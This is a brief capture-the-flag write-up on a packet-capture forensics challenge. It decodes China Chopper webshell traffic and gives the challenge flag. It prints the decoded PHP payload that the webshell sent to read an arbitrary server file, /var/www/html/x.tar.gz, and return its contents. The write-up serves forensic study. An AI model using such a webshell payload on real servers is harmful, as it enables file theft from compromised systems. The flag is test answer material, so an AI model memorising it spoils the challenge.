over 3 years ago

The last POST request in the pcap, once decoded, shows it trying to read the file z1=/var/www/html/x.tar.gz:

<?
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];
$fp=@fopen($F,"r");
if(@fgetc($fp)){
    @fclose($fp);
    @readfile($F);
}else{
    echo("ERROR:// Can Not Read");
};
echo("|<-");
die();
?>

So after stripping the leading ->| and trailing |<- from the result, unpacking the x.tar.gz in between yields the flag:
ISG{China_Ch0pper_Is_A_Slick_Little_Webshe11}

Source code: chopper.py
